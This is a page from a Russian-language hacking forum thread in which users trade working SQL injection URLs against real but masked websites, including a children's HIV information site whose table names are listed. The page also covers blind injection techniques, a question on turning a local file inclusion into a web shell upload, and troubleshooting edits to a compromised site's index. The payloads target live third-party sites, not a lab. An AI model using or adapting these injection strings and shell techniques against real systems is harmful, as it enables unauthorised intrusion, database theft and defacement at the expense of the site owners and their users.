Старый 11.06.2011, 15:25   #1051
napas_hd
 
Регистрация: 09.07.2010
Сообщений: 70
Репутация: 4
По умолчанию

Nightmare,
Цитата:
4.1.2 Пробельные символы
https://rdot.org/forum/showthread.php?t=124
napas_hd вне форума   Ответить с цитированием
Старый 11.06.2011, 15:32   #1052
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
SQL:
http://***.ru/old/wooman.php?id=-1+union+select+1,2,version(),4,5,6,7+--+1

защита - хостинг sweb, скорее всего тут без вариантов, но может быть какие то варианты вывести информацию из любой таблицы есть?
POST не канает в данном запросе ;(
Из какой таблица тебе нужно вывести информацию?
childhivru.adm_texts
childhivru.adm_texts_en
childhivru.news
childhivru.news_en
childhivru.questions
childhivru.stat
childhivru.texts

В админку доступа нет.
Цитата:
http://***.ru/old/admin/ HTTP 401 Authorization Required

Последний раз редактировалось Twost; 17.05.2013 в 12:37..
Flakt вне форума   Ответить с цитированием
Старый 11.06.2011, 17:12   #1053
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

http://www.***.ru/event_more.php?bc_tovar_id=20

http://www.***.ru/event_more.php?bc_tovar_id=(select+if(ascii(substr ing((select count(table_name)+from information_schema.columns where column_name like 0x2570617325),1,1))=2,20,4))
должно же вернуть то же самое, не?

Последний раз редактировалось Twost; 17.05.2013 в 12:37..
skM вне форума   Ответить с цитированием
Старый 11.06.2011, 23:48   #1054
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Есть шелл, индекс вроде правится, изменения сохраняются. Но при заходе через web изменений нет.
Прошерстил конфиги ngnix, апача - все нормально, правлю там, где надо. Соседние файлы при правке изменения отображают.

Конфиги:
апач:
Код:
<VirtualHost 22.33.44.55:8080>
    ServerName site.ru
    ServerAdmin yura@site.ru
    DocumentRoot /home/www
    ServerAlias www.site.ru:8080
</VirtualHost>
Код:
httpd DirectoryIndex
index.html index.php index.phtml index.htm
ngnix.conf
Код:
server {
        listen       22.33.44.55:80;
        charset windows-1251;
        server_name www.site.ru site.ru;
        location / {
                proxy_pass      http://site.ru:8080;
        }}
.htaccess отсутствует.

Где еще и что можно глянуть? Может, встречался кто с подобным.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 12.06.2011, 01:08   #1055
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

nomad, я встречался, и не раз.
Есть некоторые хостинги... по какому принципу они работают я не понял, но в моих случаях информация обновлялась примерно за полчаса... так что рекомендую просто подождать, и скорее всего инфа обновится.
Nightmare вне форума   Ответить с цитированием
Старый 12.06.2011, 17:26   #1056
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

кеширование, ищите в конфигах сервера для кеша, либо в конфигах самого скрипта.
b3 вне форума   Ответить с цитированием
Старый 13.06.2011, 08:51   #1057
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

Цитата:
http://www.***.am/index.php?lang=eng&s=news_and_events&ss=0&id=55+un ion+select+0
помоему очень сложный филтер
пробовал много вариантов,не получелось

Последний раз редактировалось Twost; 17.05.2013 в 12:38..
salut вне форума   Ответить с цитированием
Старый 13.06.2011, 12:54   #1058
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

salut: POST

Если опять будет деф, я опять повыпиливаю все твои аккаунты с форума, и на этот раз сделаю период бана более длительным
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 14.06.2011, 13:36   #1059
G0han
 
Регистрация: 14.06.2011
Сообщений: 7
Репутация: 0
По умолчанию

Приветствую!

Нашлась LFI на одном ресурсе, единственная проблема- с помощью нее можно прочесть только первую строку файла.
Происходит это вот так:
$fileb = "dbase/mll/m.".$m;

$fp = fopen($fileb, "r");

$readfile = file($fileb);

$data = explode ("|||", $readfile[0]);
Потом выводятся куски массива $data.
Соответственно при попытке чтения например etc/apache2/httpd.conf получаем самую первую строчку его и всё.
Зааплоадить туда чего-либо возможности нет
Вопрос - как правильно эксплуатировать эту дыру, чтобы залить шелл?



Вопрос второй:
http://www.***.edu/tage/index.php?path=asdasd
Фильтруются почти все значащие символы. Обойти не получилось. Какие есть варианты?

Вопрос третий:
http://www.***.ru/page.php?path=0.3.11char(39))+order+by+1,2,3,4,5,6 ,7,8,9,10
Вообще инжекты только начал изучать, поэтому пока не очень догоняю как правильно интерпретировать ответ сервера. Вроде бы и не особо замороченные случаи, но статьи всяческие не особо помогли. SQLinj вообще достаточно своеобразен в понимании и освоении. Логику пока не очень догнал.
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (showw = 1)' at line 1"
Как правильно работать с этим?



Заранее спасибо за ответы

Последний раз редактировалось Twost; 17.05.2013 в 12:39..
G0han вне форума   Ответить с цитированием
Старый 14.06.2011, 13:51   #1060
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

G0han
слепая
http://www.***.ru/page.php?path=0.3.11%20and%20substring%28version%2 8%29,1,1%29=5

Последний раз редактировалось Twost; 17.05.2013 в 12:39..
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot